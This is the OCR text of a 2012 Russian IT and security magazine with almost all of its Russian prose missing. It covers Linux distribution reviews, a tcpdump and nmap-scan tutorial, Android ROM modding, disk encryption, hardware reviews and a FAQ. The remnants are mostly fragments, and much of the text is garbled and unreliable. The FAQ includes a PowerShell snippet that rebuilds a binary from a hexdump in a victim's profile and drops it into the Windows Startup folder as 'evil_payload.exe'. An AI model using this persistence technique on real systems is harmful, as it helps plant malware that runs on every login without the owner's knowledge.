Sabayon Gentoo,
Distrowatch.com .
Fabio Erculiani. ,
, Gentoo ,
, .
(
) Gentoo.
, 5.4
ServerBase .
01 /156/ 2012
,
SpinBase:
: KDE, GNOME;
: XFce, LXDE, Enlightenment SpinBase/
OpenVZ ( OpenVZ).
,
CoreCDX, SpinBase
(Fluxbox). 4.1
Molecule.
DAILY . ,
( isohybrid).
Gentoo, Portage,
. , Sabayon
Entropy. , , ,
Gentoo ,
. equo:
, Sabayon ,
, .
,
. 6 /etc/make.conf . ,
, ,
. make.conf
.
Live-
. (
XBMC). Anaconda,
. ,
. , , ,
. , , (
man).
Sabayon , ,
. ,
wide-, 4:3 ,
GNOME , root
.
. , .
( ATI NVidia)
. :
,
. . , . .config Sabayon
, Calculate Linux ( Calculate 1560 ,
866, Sabayon 2625 1250 ).
, . /etc/skel
( 14 ),
.
,
,
Gentoo CL.
# equo install mc
equo , , ,
apt-get: , , ,
smart- ( ),
.
Magneto Store equo ( Magneto). Store
( ) ,
.
(USE-, , . .) ,
Portage. : emerge ,
equo ( Package Setting),
- . ,
, equo . , , , . Sabayon
.
Calculate Linux ( ),
01 /156/ 2012
DISTROWATCH.COM
( 06.11.2011)
1. Mint
2. Ubuntu
3. Fedora
4. Debian
5. openSUSE
6. Arch
7. PCLinuxOS
8. CentOS
9. Puppy
10. Mandriva
2155
2108
1686
1318
1290
1222
1032
916
866
708
11. Mageia
12. Lubuntu
13. Scientific
14. Zorin
15. Slackware
16. Chakra
17. Sabayon
18. FreeBSD
19. Bodhi
20. Gentoo
627
612
575
563
563
563
557
490
478
453
103
UNIXOID
: calculate-linux.ru
: GPL
: i686, x86_64
: Intel Pentium II, 128 (XFce) 512 (KDE) M
RAM, 46
Kernel 3.0.4, Glibc 2.23.4, Udev 164, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.1, LibreOffice.Org 3.3.4
, .
: (CDS Directory
Server) KDE- (CLD) , (LDAP, mail, ftp,
jabber, , . .). ,
. ,
, : GNOME (CLDG), XFce (CLDX), CMC (Calculate
Media Center, XBMC), CLS (Calculate Linux
Scratch) CSS (Calculate Scratch Server). , ,
. ,
Gentoo, IRC-
Gentoo Foundation. (Anthony G. Basile)
hardened/selinux-.
100 % Gentoo ( Gentoo)
, CL .
Calculate 2 ( ). , cl-install,
, , ,
.
,
.
,
,
Gparted c/fdisk. LVM
soft RAID /boot-.
IRC , . , .
RAM, , . ,
initramfs udev, ,
, Sabayon.
11.0 , ,
Sabayon,
, ,
( ). CL
equo,
emerge, , , vs .
,
( ).
REDHAT/FEDORA SLACKWARE
, Linux , RedHat/Fedora Slackware,
. ,
.
CentOS, , ,
, RedHat
.
Fedora
, ,
.
Fusion Linux (fusionlinux.org). Fuduntu
(fuduntu.org) Ubuntu, Fedora.
KDE Xange Linux (openxange.com) , .
RedHat (, CentOS)
Yellow Dog Linux (yellowdoglinux.com). ,
PowerPC PS3.
. VectorLinux (www.
vectorlinux.com), ;
Zenwalk (zenwalk.org), ; DeepStyle (deepstyle.org.ua) AgiliaLinux (
MOPSLinux, agilialinux.ru).
(/var/lib/layman/calculate/profiles/patches), , ,
.
: Grub .
- ,
. /var/calculate/linux cl-install.
Chromium OS , , .
( *) .
# eselect profile set 1
Gentoo. CL - , , USE- .
ebuild-
104
Calculate Linux
01 /156/ 2012
, 50 % ).
2.32. , KDE, XFce, Fluxbox . : DVD- (
, ), OEM- CD- ( ).
Windows .
( ), .
Zorin OS 5.1
: zorin-os.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 2.6.38, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.2,
LibreOffice.Org 3.3.3.1
Linux Mint
UBUNTU
, Ubuntu, , . ,
.
: linuxmint.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 4
Kernel 2.6.38-8, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.1,
LibreOffice.Org 3.3.2
Ubuntu, , , Linux. (
) Distrowatch.com,
. Clement Lefebvre.
,
.
( ).
Windows-.
,
Ubuntu, 100 %.
, ,
Ubuntu, .
. , . , ,
mintMenu, mintInstall
mintUpdate. mintInstall
: . , , ,
. Ubuntu Software Center,
, .
, -
(community.linuxmint.com/software). mintUpdate
: ,
, . Ubuntu, LTS-
.
LMDE, Debian
Gnome XFce Rolling
release. LMDE (201109).
GNOME (
01 /156/ 2012
, Ubuntu
, Windows.
( GnoMenu, , ,
) Win7. , .
Nautilus-Elementary
Gloobus Preview, Apple Quicklook.
, Software Center .
Zorin OS Look Changer
,
, Win7, WinXP Ubuntu.
Internet Browser Manager
- ( Chrome).
ZOS Wine
PlayOnLinux Winetricks, Windows. Ubuntu. , Core (
), Lite ( LXDE) Educational
. (Ultimate, Business,
Multimedia, Gaming) .
Ubuntu, LTS- (3.1).
Zorin OS Win7
105
UNIXOID
Localization Manager (addlocale):
, , .
, . ,
PCLinuxOS Magazine,
(Karoshi, CAElinux, TinyMe ZEN-mini).
Mageia 1
: mageia.org/ru/
: GPL
: i586, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0.4, Glibc 2.12.1, Udev 173, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.4, LibreOffice.Org 3.4.3
PCLinuxOS addlocale
MANDRIVA
, Mandriva
.
2003 Mandrake
( Mandriva). Radically Simple .
, Live-.
. 2007 PCLinuxOS Mandriva.
KDE-, (XFce, LXDE, OpenBox GNOME) . Full Monty Desktop DVD
, . Rolling
release, RPM-based.
PCLOS , 64- CPU.
CD-,
.
, LibreOffice
. URPM PCLinuxOS
,
APT Synaptic. ,
DrakX, : , .
, -
ZOS
WINE
PLAYONLINUX WINETRICKS
106
, , 2010.
Mandriva, . ,
Mandriva, ,
.
.
.
, , , , . ,
Mageia :
161 , 20 .
. -, 32- CD KDE GNOME. (Europa 2). DVD-
ISO, , 32-,
64- . .
Mageia Mandriva. Mageia Live ,
. ,
: .
, ,
. Mageia Control
Center, Mandriva CC. Rpmdrake.
Mandriva Mageia 1. ,
, mageia.org/en/1/migrate. z
Mageia Mandriva,
01 /156/ 2012
(execbit.ru)
TCPDUMP
UNIX-
.
,
tcpdump. ,
Linux
BSD- , ,
.
tcpdump , ,
.
,
.
tcpdump , .
25 ,
UNIX.
UNIX-
Windows libpcap, tcpdump.
, tcpdump,
,
.
01 /156/ 2012
107
UNIXOID
tcpdump ,
TCP, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump
?
. :
Flags [.], seq 3666073194:3666074622, ack 3281095139,
win 2000, options [nop, nop, TS val 70228462 ecr 1681724],
length 1428
TCP-, tcpdump
( ):
DNS- tcpdump
DNS-
, tcpdump
. root ( , tcpdump
),
:
# tcpdump -i wlan0 -c 10 -n
, tcpdump, ,
DNS- tcpdump.
, DNS- ( 53) 192.168.0.101
192.168.0.1 . ?
16:22:41.340105 ( frac).
IP, , , :
: . , ,
. tcpdump
,
.
tcpdump DNS- 49244+ A? ya.ru. (23), ,
A?, ya.ru,
TCP/IP- 23
. .
,
, (8/2/3) (A
213.180.204.3, A 77.88.21.3, A 87.250.250.3...).
108
flags .
S (SYN), F (FIN), P (PUSH) R (RST),
.
data-seqno ,
first:last, first last
nbytes.
ack (ISN + 1).
window .
options ,
<mss 1024> ( ).
lenght .
,
.
, -X:
# tcpdump -i wlan0 -c 10 -n -X \
host 192.168.0.1 and port 80
, HTTP, .
, , .
,
'-v'. IP
IP-:
(tos 0x0, ttl 64, id 8339, offset 0, flags [DF],
proto UDP (17), length 51)
-, .
(TOS), (TTL),
,
, , (TCP,
UDP, ICMP) .
tcpdump, .
, host port,
, ,
, ?
src:
# tcpdump -i wlan0 -c 10 -n src 192.168.0.1
dst,
. , and:
# tcpdump -i wlan0 port not 22 and port not 53
01 /156/ 2012
GREP
TCPDUMP
tcpdump
,
.
ngrep,
, .
, , GET
POST HTTP-,
:
tcpdump:
i [] , any.
n IP- DNS-.
nn IP- .
X .
XX Ethernet-.
v, -vv, -vvv
(, , ).
c [n] n .
s [n] , ( ,
).
S TCP-
(TCP sequence numbers).
e Ethernet-.
q ( ).
E IPsec- .
SYN ( TCP-), :
# tcpdump 'tcp[13]==2'
:
# tcpdump -i wlan0 -c 10 -n > 32 and <= 128
? . TCP-
,
. SYN .
, . ,
:
:
# tcpdump 'tcp[tcpflags] & tcp-syn != 0'
# tcpdump -i wlan0 c 10 -n src net 192.168.0.0/16 \
and dst net 10.0.0.0/8 or 172.16.0.0/16
tcpdump
.
: proto[expr:size], proto , expr
, size ,
( 1
). , -
tcpdump :
,
TCP/IP.
tcpdump,
.
1 , tcpdump
TCP- , nmap. , nmap 192.168.0.100
1. TCP-
01 /156/ 2012
109
UNIXOID
2. SYN-
TCP- ,
SYN- (S ). 8888,
RST-. ,
.
587 . , nmap SYN-
22- (SSH) SYN-ACK:
, TCP-
, , ,
, . tcpdump
2.
TCP-, -
:
, nmap ,
RST-, .
: , ACK-,
. , , , .
:
, . , ,
, nmap, , .
:
SYN- (nmap -sS). -
, ,
SYN-ACK, ,
, . 3 UDP-. : nmap UDP-,
. ,
ICMP unreachable:
RTMP-
-, tv.adobe.com,
RTMP .
, tcpdump .
RTMP-, :
# tcpdump -eflAi eth0 -s 0 -w - | strings | \
grep -ao "rtmp://.\+.flv"
rtmpdump (lkcl.net/rtmp) flv- :
$ ./rtmpdump -r 'URL' -o .flv
.
null-, ,
(nmap -sN).
, . , Linux RST-:
192.168.0.100.39132 > 192.168.0.111.256: Flags [],
win 3072, length 0
192.168.0.111.256 > 192.168.0.100.39132: Flags [R.], ...
, . ACK-
110
01 /156/ 2012
3. UDP-
(-sA) tcpdump
ACK
RST. , ,
, nmap ,
. tcpdump
, , ICMP-
:
16:43:06.008305 IP 192.168.0.100
type-#68, length 1032
16:43:06.008383 IP 192.168.0.100
type-#34, length 1032
16:43:06.008714 IP 192.168.0.100
type-#183, length 1032
16:43:06.008831 IP 192.168.0.100
type-#192, length 1032
, ,
.
ICMP- . (, SYN)
.
tcpdump ,
,
.
, tcpdump
,
Wireshark:
$ ssh root@example.ru tcpdump -w - 'port !22' \
| wireshark -k -i -
google.com tcpdump
, ,
,
. ,
, Cisco Discovery Protocol,
Cisco :
# tcpdump -nn -v -i eth0 -s 1500 -c 1 \
'ether[20:2] == 0x2000'
,
DHCP (DISCOVER, REQUEST, INFORM),
:
grep,
, :
# tcpdump -nnvv -r dump.cap tcp | \
grep -v "tcp sum ok" | wc l
01 /156/ 2012
, POP3-:
tcpdump , , .
,
. z
111
UNIXOID
(execbit.ru)
ID
O
R
D
N
A
Android
,
,
.
,
.
Linux,
Android ,
.
112
WWW
goo.gl/tlHRo
framework-res.apk.
goo.gl/fTvz8
Android.
goo.gl/Ya1fX
.
goo.gl/P6JR
IBM PC.
goo.gl/sGXwa
Android Honeycomb.
Android-:
1. , Google CyanogenMod.
2. .
3. ,
.
,
Android ,
.
, Android
, ,
.
( ) Android-,
.
,
,
. ,
, ,
.
.
01 /156/ 2012
xda-developers
, ,
ClockworkMod, ( , ,
,
][).
, , ,
. ,
, .
?
, ,
xda-developers.com.
, iOS, Windows
Mobile, Windows Phone Android. ,
Forums . Android
Development , [ROM]. -
Pure Android 2.3 Rom
CyanogenMod, , ,
(, , ). , , -
ROM .
.
unzip:
$ mkdir ~/rom; cd ~/rom
$ unzip ..///.zip
, , , , Android, ,
NAND- .
Android ,
,
/system/app
. ,
, . ,
, Android ( ADWLauncher
CyanogenMod) . K,
LauncherPro (www.launcherpro.com):
01 /156/ 2012
113
UNIXOID
$ rm system/app/Launcher.apk
$ wget goo.gl/U9c54 -o system/app/LauncherPro.apk
. , ,
. , Android
.
.
(, prey),
. ,
Dialer One Phone.apk Go SMS
sms.apk.
Linux-, ssh mc? .
Android ARM NDK
Google,
. , mc .
xda-developers Midnight
Commander. apk- (goo.gl/Pax1H)
unzip:
$ cd /tmp; unzip ~/NativnuxInstaller_1.1.apk
assets/kits/mc-4.7.5.4arm.tar.jet. tar.gz,
apk- ( ,
apk, Install).
mc:
$ cd ~/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet
mc.
zip-
ClockworkMod Recovery. ,
(
~/rom) unzip.
SETPROP
build.prop
setprop:
# setprop debug.sf.nobootanimation 1
layout XML (
AXML, apktool XML).
,
, , .
xda-developers,
Android.
framework-res mod
_.
framework-res.apk, . , framework-res
diff:
$ diff -R ~/framework-res \
~/rom/system/framework/framework-res
,
framework-res,
4PDA: goo.gl/tlHRo.
framework-res.apk
apktool.
aapt Android SDK, apktool
apk-. :
$ cd ~/bin; wget goo.gl/tC7k8
,
Android .
Android, , .
Android framework/
framework-res.apk.
apktool:
$
$
$
$
cd ~; wget goo.gl/hxz5l
tar -xjf apktool1.4.1.tar.bz2
cd ~/rom/system/framework
java -jar ~/apktool.jar d framework-res.apk
framework-res, . res/drawable-* res/layout-*.
png-
. , drawableland-mdpi
,
(
). ,
.
114
$
$
$
$
cd ~/rom/system/framework
java -jar ~/apktool.jar b framework-res
cp framwork-res/dist/framework-res.apk .
rm -rf framework-res
. png-, system/
media/bootanimation.zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation
,
ANDROID
01 /156/ 2012
FPS 24):
$ mplayer -nosound -vo png:z=9 video.avi
. xda-developers
,
.
.
, , . Android
system/build.prop,
.
,
Android, .
.
ClockworkMod Recovery: Android
$ unzip ~/rom/system/media/bootanimation.zip
desc.txt, :
FPS
p
...
1. :
ro.HOME_APP_ADJ=1
.
.
2. JPG-:
:
ro.media.enc.jpeg.quality=100
480 800 30
p 1 0 part0
p 0 0 part1
01 /156/ 2012
, .
3. :
debug.sf.nobootanimation=1
4. GPU:
debug.sf.hw=1
.
5. ( USB):
persist.adb.notify=0
115
UNIXOID
wifi.supplicant_scan_interval=180
pm.sleep_mode=1
ro.ril.disable.power.collapse=0
3. 3G-:
ro.ril.hsxpa=2
ro.ril.gprsclass=10
ro.ril.hep=1
ro.ril.enable.dtm=1
ro.ril.hsdpa.category=10
ro.ril.enable.a53=1
ro.ril.enable.3g.prefix=1
ro.ril.htcmaskw1.bitmask=4294967295
ro.ril.htcmaskw1=14449
ro.ril.hsupa.category=5
4. :
framework-res.apk
net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960
system/
build.prop .
, , , . testsign.
zip:
$ cd ~/rom; zip -r my-rom.zip *
, Recovery
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip
6.
:
ro.lge.proximity.delay=25
mot.proximity.delay=25
7. :
ro.mot.buttonlight.timeout=0
,
:
1. :
debug.performance.tuning=1
video.accelerate.hw=1
windowsmgr.max_events_per_sec=150
2. :
116
my-rom-signed.zip
.
Recovery,
( ).
Wipe data/factory reset,
( Recovery <Enter>), Yes
<Enter>.
Install zip from sdcard,
Choose zip from sdcard, my-rom-sign.zip SD-
Yes. Reboot
system now.
Android ,
.
, , ,
,
(/etc/init.d), .
. z
01 /156/ 2012
- Ubuntu 11.10
-
UBUNTU 11.10
Oneiric Ocelot ( ) 15- Linux- Canonical.
Unity. CD-,
DVD- ( 1,5 ),
(Inkscape, GIMP, Pitivi LibreOffice). ISO-
CD/DVD, USB Flash.
:
Linux kernel 3.0.1;
Unity 4.12.0
Compiz 0.9.6;
GNOME 3.2;
Mozilla Firefox 7.0.1, Mozilla
Thunderbird 7.0.1, LightDM,
Deja Dup, - Gwibber;
LibreOffice 3.4.2;
Python 3.2, GCC 4.6.1, Bash 4.2, CUPS 1.5.0,
Pidgin 2.10.0, UDEV 173, X.Org 1.10.4;
ARM- .
:
Ubuntu (Dash Home)
Launcher. Places,
,
Lenses,
(
, ,
, Google Docs) ,
.
.
<Alt+Tab>.
. ,
01 /156/ 2012
.
( ).
,
Launcher.
Unity
, . ,
,
, ,
.
Qt Unity 2D, OpenGL. Unity 2D
Qt
Qt Quick. Unity 2D
, Unity 3D,
ARM.
Ubuntu LoCo
(goo.gl/cC5kr, ubuntu-defaults-builder),
: ,
, ,
, ,
- Banshee
Rhythmbox .
cloud-
.
, .
.
Cannonical 2013 .
Ubuntu 12.04,
2012 , LTS-,
.
117
SYN/ACK
aka 13oz
WWW
gscentr.ru
GSPD
.
,
,
-
.
.
,
( ),
. ,
, .
.
118
01 /156/ 2012
,
. -,
(-).
, . ,
: 687 781.
. ,
.
1)
, ,
, ,
( ) .
, :
, , .
2) ( ) ,
, ,
( ) , . ,
.
3) () , .
, ,
. . ,
,
58 .
, ,
, .
4) ,
- ,
. ,
, . , .
5) .
: / , , ,
( ) ,
. ?
,
.
6)
, ,
. :)
, :
, (/), ( , ,
),
,
(/) ( ).
.
7) , ,
. ,
, ,
. .
8) .
: ,
, , (
,
01 /156/ 2012
, - ),
.
9) , ,
, ,
.
10) , , ,
- .
? ,
,
.
11) , ,
, ,
.
, , 2 ( ), ,
, , , etc.
12)
,
, . ,
,
. :)
, ,
(
etc), ,
( ). ( ).
13) ,
.
, !
, ,
, .
14) , .
.
15) ,
,
,
.
, , , , ,
, .
16)
. ,
, . ? , .
- . ,
(
),
( ) .
.
17)
. ,
, , . ,
,
. , , ,
, ,
, .
18) ,
.
119
SYN\ACK
SYN/ACK
19) ,
?
. ,
, ( , ,
1 . ) - ,
. - ?
, , ,
- : ,
( ) . 90 .
, (
) .
20) , . , - .
,
.
, ,
. .
,
, . ,
,
. . :) ,
.
, ,
,
ISPDN.RU . ,
,
, , ,
.
,
,
- -.
, ( ,
,
),
. ,
. , ,
, , - ,
. z
?
:
1) , ,
, ,
.
2)
152-, .
3)
152- .
4)
,
,
. ,
, , ,
,
,
.
5)
:
. .
,
. . ,
, ,
.
120
. ,
,
, ,
,
, . .
.
,
, ,
, ,
.
.
6) ,
( ) (
)
( ).
7)
.
, ,
. ,
, ,
.
8) ,
(
,
,
, etc).
9)
152-.
10)
, , .
,
.
11)
,
, ,
,
.
.
01 /156/ 2012
FAQ
, ,
, ,
. ,
. ,
,
,
.
.
.
, .
,
, , , ,
. .
,
,
VLAN
.
01 /156/ 2012
.
.
,
?
,
,
,
. ,
,
- .
,
.
:
3;
2;
1.
, ( ),
2 -
.
,
.
.
,
. ,
.
,
?
,
?
,
.
.
:
,
, .
,
.
121
SYN/ACK
grinder (grinder@tux.in.ua)
WWW
LUKS code.
google.com/p/
cryptsetup
MySQL 5.6
Reference Manual
Encryption and
Compression - clck.
ru/P85I
Windows Azure SDK
microsoft.com/
windowsazure/sdk
vGate R2
securitycode.ru/
products/sn_vmware/vgate_com
Novell
Cloud Security Service novell.com/
products/cloudsecurity-service
FreeOTFE
freeotfe.org
INFO
. ,
PR, ,
,
.
,
.
.
.
122
. ,
(PaaS)
(SaaS) ,
.
,
. , (
). , . ,
, , ,
- .
, ,
, .
, , v-index.com, 38,9 %. ,
, . ,
.
,
,
,
.
,
SaaS (Software as a Service )
PaaS (Platform as a Service ),
, .
,
. : .
,
,
SaaS. , .
, ,
. ,
, Google Amazon,
,
01 /156/ 2012
v-index.com,
, -
.
- ,
. ;)
,
. ,
- .
, .
.
,
( )
, ,
, . ,
.
, DMZ ,
(VPN, /etc/host.allow).
DDoS-
.
. ,
, SaaS
. , . ,
.
,
, .
Security Code TrustAccess (securitycode.ru/
products/trustaccess) .
. ?
.
,
, , ,
. SaaS , ,
, ,
- VMware vCloud Director .
, ,
( ):
, .
,
. , ComputerWorld,
, ,
, VMware
vSphere. SaaS .
, .
, , SaaS
. , -
. -
. ,
,
( ).
,
,
- . ,
, VMware, vGate
R2 (securitycode.ru/products/sn_vmware/vgate_com).
,
(
VM), ,
, ( ACL ), VM, .
() ()
. ,
-.
(gnu.org/philosophy/who-does-that-server-reallyserve.html)
, .
SaaS-
.
,
.
. ,
01 /156/ 2012
vGate
123
SYN\ACK
SYN/ACK
Novell Cloud Security Service (NCSS, novell.
com/products/cloud-security-service)
, .
NCSS :
( Active Directory). ,
SaaS/PaaS/IaaS, , NCSS
, .
, SaaS
,
. ,
, SaaS
.
,
.
, ,
, .
.
, ,
, .
SaaS . HTTPS, .
,
DM-CRYPT
dm-crypt ,
2.6+ ryptoAPI.
, ,
hybernate.
- Windows FreeOTFE,
Windows.
$ sudo apt-get install cryptsetup
:
$ sudo dd if=/dev/zero of=/dev/sda5 bs=4K
/dev/mapper/:
$ sudo cryptsetup -y luksFormat /dev/sda5
$ sudo cryptsetup luksOpen /dev/sda5 encdisk
, .
$ sudo mkfs.msdos /dev/mapper/encdisk
$ sudo mount -t vfat -o rw /dev/mapper/encdisk /mnt/
encdisk
:
$ sudo umount /mnt/encdisk
$ sudo cryptsetup luksClose /dev/mapper/encdisk
124
0124
grinder (grinder@tux.in.ua)
.
, -
,
( Amazon EC2), , . 152
(clck.ru/P0dc)
. ,
. ,
. ,
, ,
, . -152
, , , , .
. ,
. . ,
( ),
. ,
, -
. PCI (Payment
Card Infrastructure),
, : .
, , , , , PCI, .
, . ,
- ? ,
.
.
LUKS (The Linux Unified Key Setup, code.google.com/p/cryptsetup),
Linux dm-crypt, . LUKS
TKS1 (Template
Key Setup 1), ,
,
. Windows
FreeOTFE (freeotfe.org),
Linux (cryptoloop, dm-crypt)
- HSM (Hardware Security Module, ) PKCS#11.
, Windows BitLocker ( EFS,
Encrypted File System).
. ,
,
. ,
, ,
. - ,
, . ,
MySQL Reference Manual . 11.13 Encryption
01 /156/ 2012
MySQL 15
Linux dm-crypt
.
,
, , .
. ,
,
Trend Micro SecureCloud,
FreeOTFE . ,
, ,
. . Amazon EC2, Eucalyptus
vCloud. SecureCloud ,
. , / .
FreeOTFE Linux
01 /156/ 2012
, , . ,
, ,
. , . ! . z
125
0125
FERRUM
NAS
5- 6-
NAS-
.
,
( NAS)
. ,
!
. .
,
, . ,
. RAID. ,
RAID.
,
, .
,
? NAS. ,
100 ,
. NAS
, .
.
Intel NAS Performance Toolkit
. NAS , . , RAID0. RAID5 ,
.
, . ,
NAS.
.
126
01 /156/ 2012
NAS
D-LINK SHARECENTER
PRO 1200
D-Link
, Ethernet
USB. .
OLED- . ,
, .
, , . ,
, ,
.
D-Link ShareCenter Pro 1200 . ,
.
- D-Link
. , iSCSI. ,
- .
24 000
.
NETGEAR READYNAS
6 ULTRA
NETGEAR
. . . NETGEAR ReadyNAS
6 Ultra
2 . ,
12 , .
. RAID5.
FrontView. ,
.
.
, .
NETGEAR ReadyNAS 6 Ultra,
, , .
26 000
.
01 /156/ 2012
127
FERRUM
.
.
30 000
.
38 000
.
128
NETGEAR ReadyNAS
6 Ultra
NETGEAR
ReadyNAS 6
Ultra Plus
01 /156/ 2012
NAS
35 000
.
THECUS N5200XXX
Thecus N5200XXX.
. , NETGEAR: , , , .
: Intel Atom D525
1 DDR3 . ,
.
. , HDD.
OLED-, /
LAN- USB-.
Thecus N5200XXX , . , ,
, , ,
.
30 000
.
QNAP TS-559
Pro+
01 /156/ 2012
THECUS
N5200XXX
, ,
.
, NAS, 5-
6-. , ,
QNAP,
Synology Thecus. .
NETGEAR. NAS
( ), . z
129
FERRUM
SILICON POWER
SP060GBSSDV30S25
,
.
IOmeter,
SSD /
, .
IOmeter,
, . . PCMark Vantage,
HDD, ,
,
. , ATTO Disk
Benchmark /
0,5 8192 .
,
.
: SSD, 2,5
: SATA 3.0
: MLC
. : 550 /
. : 500 /
: 60
TRIM:
:
+
+
+
-
SSD, ,
,
.
SSD
.
Silicon Power
SP060GBSSDV30S25. -
60 , Windows 7
,
.
5400
.
:
IOmeter:
Random read 4 : 21,44 /
Random write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51,35 /
PCMark Vantage:
Test Suite: 26076
Windows Defender: 42,95 /
Gaming: 176,73 /
Importing pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30,18 /
Video editing using Windows Movie
Maker: 88,42 /
Windows Media Center:
340,73 /
Adding music to Windows Media
Player: 151,54 /
Application loading: 167,14 /
130
, SandForce
SF-2000
MLC.
35 ,
.
Silicon Power SP060GBSSDV30S25 ,
SATA 3.0,
. ,
, ,
IOmeter,
.
Silicon Power SP060GBSSDV30S25
:
3,5- . SSD,
480 .
,
,
. Silicon
Power SP060GBSSDV30S25, !
. z
01 /156/ 2012
PHREAKING
Loop
,
INFO
Rx Tx
Receive
Transmit
( ).
Loop . ,
, ,
, .
-
, .
. ,
,
.
, , ,
. , ,
,
.
. ,
().
, . ,
132
, . ,
: ! : !.
- : ! :
! ! ? !
! ? , !
- .
,
,
. -
, . ,
, .
(broadcast storm).
,
- (. 1). -
... .
. loop_detection,
.
, .
01 /156/ 2012
Loop
1 TX+
-. . +
2 TX-
. . -
3 RX+
-. +
4 n/c
. ( )
5 n/c
-. ( )
. -
7 n/c
-. ( )
8 n/c
. ( )
1. RJ45
: (
) Ethernet ( Telnet
web-). .
Ethernet, IP-.
Web-
, , . . , web 80 HTTP- IP-.
. 1.
DLINK DES-3200
-,
.
1. IP-
:
DES-3200# config ipif System \
ipaddress xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
3. web- IP- .
D-Link , RS-232, ,
. Out-of-Band.
,
.
(, HyperTerminal
Windows). :
Baud rate: 9,600
Data width: 8 bits
Parity: none
Stop bits: 1
Flow Control: none
. , Ctrl+r ,
.
.
,
01 /156/ 2012
Loopback-
Enter . , DES-3200#. .
, ,
, , .
? ,
.
, config,
:
133
PHREAKING
RJ-45
DES-3200#config +
? Enter.
.
TAB.
. .
: Admin User.
Admin .
CLI:
DES-3200# create account admin/user <username>
( / )
: Enter a case-sensitive new password.
15
.
Success.
Admin:
Username "dlink":
DES-3200#create account admin dlink
Command: create account admin dlink
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
DES-3200#
: DES-3200# config
account <username>
dlink:
DES-3200#config account dlink
Command: config account dlink
Enter a old password:****
Enter a case-sensitive new password:****
Enter the new password again for confirmation:****
Success.
134
delete account
<username>.
. web- Telnet,
IP- ,
. IP- DHCP BOOTP
CLI:
DES-3200# config ipif System dhcp,
DES-3200# config ipif System ipaddress \
xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy.
,
,
01 /156/ 2012
Loop
Command: save
Saving all settings to NV-RAM... 100%
done.
DES-3200#
.
reboot:
DES-3200#reboot
Command: reboot
! reset.
DES-3200#reset config
-, reset, .
loop_detection Alcatel
interface range ethernet e(1-24)
loopback-detection enable
exit
loopback-detection enable
loop_detection Dlink
enable loopdetect
config loopdetect recover_timer 1800
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap none
config loopdetect ports 1-24 state enabled
config loopdetect ports 25-26 state disabled
.
loopback .
. , , -
, UP-, , ,
. - .
:
, (Rx Tx).
,
2 6, 1 3.
, , -
-. . 3.
,
, link. !
!
, HELLO WORLD
Hello world? !
,
.
, ,
.
(. 4).
? ,
,
- -.
.
, .
. ?
. . ? !
Hello World Cshell:
01 /156/ 2012
LOOPBACK
oop ,
. ,
loopback-.
. loopback-.
, , ,
, .
:
./script.csh IP_ _.
,
. , , ,
,
!
, .
: ?
:
. ,
. , ,
, - .
!
loop_detection , .
, .
! z
135
(twtitter.com/stepah)
FAQ United
FAQ@REAL.XAKEP.RU
LINUX?
OpenSSL .
,
:
OpenSSL! -,
Linux-,
SSL-.
,
. ,
OpenSSL
, , ,
,
.
1. .
GnuPG (www.
gnupg.org),
OpenSSL:
, OpeenSSL
,
bash-. , , ,
:
$ for f in * ; do [ -f $f ] && openssl
aes-256-cbc -salt -in $f -out $f.enc
-pass file:password.txt ; done
2. . OpenSSL
, SHA1-1 MD5-. SHA1
file-test-64:
$ openssl sha1 file-test-64
SHA1(eapol-64)= afc594f26ca08780737
69d24f8c04fe35f2bf8b3
3. , SSL/TLS
,
OpenSSL.
:
, TLSv1/
SSLv3.
4. OpenSSL
speed test,
. :
$ openssl s_time -connect \
webserver.com:443
-
,
(FTP.EXE, . .)
.
,
debug.exe.
64
. , debug.exe
Microsoft.
, Windows 7 Server 2008 PowerShell, -
5 : DNS-
C&C-.
DNS- ,
IP-
.
?
,
, hosts?
136
BIND (www.isc.org).
DNS-
DNS-, BIND, , .
, ,
. DNS-.
ApateDNS (bit.ly/sZQiK1).
security- Mandiant.
DNS-
IP-, .
, , ApateDNS ( ),
DNS.
01 /156/ 2012
FAQ UNITED
. ?
.
PowerShell:
ANDROID-,
ANDROID? GOOGLE,
!
Andoid',
Android SDK,
,
ARM
x86. -
. ,
,
Bluestacks
(bluestacks.com). , Android-,
.
.
hexdump.txt -
:
77 90
184 0
0 0 0
0 0 0
144
0 0
0 0
0 0
0 3
0 0
0 0
232
0
0
0
0
0
0
0
0
Android.
. ,
, .
,
, . ,
, .
Bluestacks 7 .
,
Android x86 (www.android-x86.org),
.
(http://bit.ly/rYs9OI),
!
0 4 0 0 0 255 255 0 0
64 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0
0 14 31 ....
,
. ( ,
),
(
).
PS-:
PS > [string]$hex = get-content -path
C:\Users\victim\Desktop\hexdump.txt
PS > [Byte[]] $temp = $hex -split ' '
PS > [System.IO.File]::WriteAllBytes(
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup\evil_payload.exe",
$temp)
,
.
,
.
FakeDNS (bit.ly/szUFXI).
Malcode
Analysis Pack. ApateDNS,
DNS,
IP-. ( ) HEX.
01 /156/ 2012
Android-x86, VirtuaBox, ,
Nexus One!
